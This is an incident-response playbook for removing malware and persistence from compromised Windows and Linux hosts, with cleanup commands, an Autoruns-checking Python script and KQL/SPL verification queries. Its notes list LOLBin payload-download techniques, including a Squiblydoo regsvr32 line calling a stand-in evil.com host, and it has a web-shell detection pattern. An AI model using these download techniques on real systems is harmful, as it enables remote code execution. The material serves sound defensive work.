Remove Malware, Backdoors, and Persistence Mechanisms
Systematically remove all identified malware, backdoors, and attacker persistence mechanisms from compromised systems. Verify removal with multiple scanning engines and confirm no persistence remains.
Actions
1. Compile a complete list of all identified malicious artifacts: file paths, hashes, registry keys, scheduled tasks, services, cron jobs, web shells, and any other persistence mechanisms discovered during analysis.
2. On Windows: remove malicious scheduled tasks (`schtasks /delete /tn "TASK_NAME" /f`), services (`sc delete SERVICE_NAME`), registry Run keys, WMI event subscriptions, and startup folder entries. Use Autoruns to verify: `autorunsc.exe -a * -c -h -s -v -vt > autoruns_post_cleanup.csv`.
3. On Linux: remove malicious cron entries (`crontab -r -u COMPROMISED_USER` deletes that user's entire crontab, so capture it first with `crontab -l -u COMPROMISED_USER`; also check the system-wide entries in `/etc/crontab` and `/etc/cron.d/`), systemd services, modified SSH authorized_keys, LD_PRELOAD entries, and files in /tmp or /dev/shm. Check for rootkits: `chkrootkit` and `rkhunter --check`.
4. Run full antivirus scans with updated signatures on all cleaned systems. Use at least two different AV engines for validation.
5. Verify removal by checking that no malicious processes are running, no beaconing to C2 infrastructure is occurring, and all identified IOCs have been removed.
6. Sweep common malware hiding locations: `C:\Windows\Temp\`, `C:\Users\*\AppData\Local\Temp\`, `C:\Users\*\AppData\Roaming\`, `C:\ProgramData\`, `C:\$Recycle.Bin\`, `C:\Windows\System32\` (misnamed DLLs), and `C:\Windows\WinSxS\`. Check for DLLs with anomalous timestamps or unsigned files in normally-signed directories using `sigcheck.exe -u -e C:\Windows\System32`.
7. Remove WMI event subscription persistence (frequently missed): `Get-WmiObject -Namespace root\subscription -Class __EventFilter`, `Get-WmiObject -Namespace root\subscription -Class __EventConsumer`, `Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding`. Delete all malicious bindings, then their filters and consumers (pipe each object to `Remove-WmiObject`). Also check for COM object hijacking in `HKCU\Software\Classes\CLSID\` and `HKLM\Software\Classes\CLSID\` pointing to attacker DLLs.
8. On Linux, verify system binary integrity against the package manager: `rpm -Va` (RHEL/CentOS) or `debsums -c` (Debian/Ubuntu) to detect trojanized binaries. Check for LD_PRELOAD persistence in `/etc/ld.so.preload` and verify no malicious shared objects in `/lib/` or `/usr/lib/`. Scan for web shells in web roots: `find /var/www -name "*.php" -newer /var/log/syslog -exec grep -l "eval\|base64_decode\|system\|exec" {} \;` (`/var/log/syslog` is rewritten continuously, so use as the `-newer` reference a file whose modification time predates the compromise).
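The verification in steps 1, 2, 5 and 6 can be scripted. The following Python, added here as an example and not part of the original playbook, parses the `autoruns_post_cleanup.csv` produced by `autorunsc -c -h -s` and flags any autostart entry whose image path or SHA-256 is still on the compiled artifact list, or which points at an unverified binary inside `System32`. The CSV sample, the artifact list and the column names are constructed assumptions (check them against the header of your real export, decoded to text before parsing).

```python
import csv
import io

# Directories in which every binary is expected to carry a verified signature (step 6).
SIGNED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Constructed sample in the shape of `autorunsc -a * -c -h -s` output; the column names
# are an assumption and should be checked against the first line of the real CSV.
SAMPLE_AUTORUNS_CSV = r"""Time,Entry Location,Entry,Enabled,Category,Profile,Description,Signer,Company,Image Path,Version,Launch String,MD5,SHA-1,PESHA-1,PESHA-256,SHA-256,IMP
"1/2/2024 9:00 AM","HKLM\System\CurrentControlSet\Services","Dhcp","enabled","Services","System-wide","DHCP Client","(Verified) Microsoft Windows","Microsoft Corporation","c:\windows\system32\svchost.exe","10.0.19041.1","C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted","md5-a","sha1-a","pesha1-a","pesha256-a","sha256-a","imp-a"
"1/2/2024 9:00 AM","HKCU\Software\Microsoft\Windows\CurrentVersion\Run","Updater","enabled","Logon","CORP\jdoe","","(Not verified) Updater Co","Updater Co","c:\users\jdoe\appdata\roaming\updater\svc_host.exe","1.0.0.0","C:\Users\jdoe\AppData\Roaming\updater\svc_host.exe","md5-b","sha1-b","pesha1-b","pesha256-b","sha256-b","imp-b"
"1/2/2024 9:00 AM","HKLM\Software\Microsoft\Windows\CurrentVersion\Run","Helper","enabled","Logon","System-wide","","","","c:\windows\system32\example_unsigned.dll","","rundll32.exe c:\windows\system32\example_unsigned.dll,Start","md5-c","sha1-c","pesha1-c","pesha256-c","sha256-c","imp-c"
"""

# Constructed artifact list (step 1): image paths and SHA-256 values identified during analysis.
IOC_PATHS = [r"C:\Users\jdoe\AppData\Roaming\updater\svc_host.exe"]
IOC_HASHES = ["SHA256-B"]


def check_autoruns_csv(csv_text, ioc_paths, ioc_hashes):
    """Return autostart entries that show cleanup is incomplete.

    An entry is reported when its image path or SHA-256 is still on the IOC list,
    or when it points at an unverified binary inside a normally signed directory.
    """
    wanted_paths = {p.lower() for p in ioc_paths}
    wanted_hashes = {h.lower() for h in ioc_hashes}
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        path = (row.get("Image Path") or "").lower()
        sha256 = (row.get("SHA-256") or "").lower()
        signer = row.get("Signer") or ""
        reasons = []
        if path in wanted_paths:
            reasons.append("image path on IOC list")
        if sha256 and sha256 in wanted_hashes:
            reasons.append("SHA-256 on IOC list")
        if path.startswith(SIGNED_DIRS) and not signer.startswith("(Verified)"):
            reasons.append("unsigned binary in normally signed directory")
        if reasons:
            findings.append({"entry": row.get("Entry"), "location": row.get("Entry Location"),
                             "path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in check_autoruns_csv(SAMPLE_AUTORUNS_CSV, IOC_PATHS, IOC_HASHES):
        print(hit["location"], hit["entry"], hit["path"], "; ".join(hit["reasons"]))
```

Any finding means the host is not clean: either an artifact from the list survived, or an unverified binary is launching from a location where everything should be signed, which step 6 tells you to inspect.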
Queries
Microsoft Defender XDR (KQL). Replace `KNOWN_C2_DOMAINS` and `KNOWN_C2_IPS` with the indicator lists from the artifact inventory (for example as `let` dynamic arrays); path fragments use verbatim `@"..."` strings so the backslashes are not read as escapes.

```kusto
// Verify no new files in common malware staging paths after cleanup
DeviceFileEvents
| where Timestamp > ago(1h)
| where DeviceName == "CLEANED_HOST"
| where FolderPath has_any (@"\Temp\", @"\AppData\", @"\ProgramData\")
| where ActionType == "FileCreated"
| project Timestamp, FileName, FolderPath, InitiatingProcessFileName

// Verify no C2 beaconing post-cleanup
DeviceNetworkEvents
| where Timestamp > ago(4h)
| where DeviceName == "CLEANED_HOST"
| where RemoteUrl in~ (KNOWN_C2_DOMAINS) or RemoteIP in (KNOWN_C2_IPS)
| project Timestamp, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName
```

Splunk (SPL). Process creations on the cleaned host in the last hour, excluding images under `System32` (backslashes are doubled because `\` is the escape character inside quoted SPL strings):

```spl
index=wineventlog sourcetype=WinEventLog:Security host=CLEANED_HOST EventCode=4688 earliest=-1h
| stats count by New_Process_Name, Process_Command_Line, Account_Name
| search New_Process_Name!="C:\\Windows\\System32\\*"
| sort -count
```

Sysmon network connections from the cleaned host in the last 4 hours to destinations outside the RFC 1918 ranges, grouped by destination and initiating image:

```spl
index=sysmon sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational host=CLEANED_HOST EventCode=3 earliest=-4h
| stats count by DestinationIp, DestinationPort, Image
| search DestinationIp!="10.*" DestinationIp!="172.16.*" DestinationIp!="192.168.*"
| sort -count
```
Notes
Always take a forensic image of the system BEFORE beginning malware removal. The pre-cleanup state is critical evidence.
If a system has multiple persistence mechanisms or rootkit indicators, rebuilding from a clean image is safer than selective cleaning.
Common LOLBins used for malware execution that may not trigger AV: `rundll32.exe` (loading malicious DLLs), `certutil.exe -urlcache -split -f` (downloading payloads), `bitsadmin /transfer` (background downloads), `mshta.exe` (executing HTA files), and `regsvr32.exe /s /n /u /i:http://evil.com scrobj.dll` (Squiblydoo). Remove the downloaded payloads and check for persistence using these tools.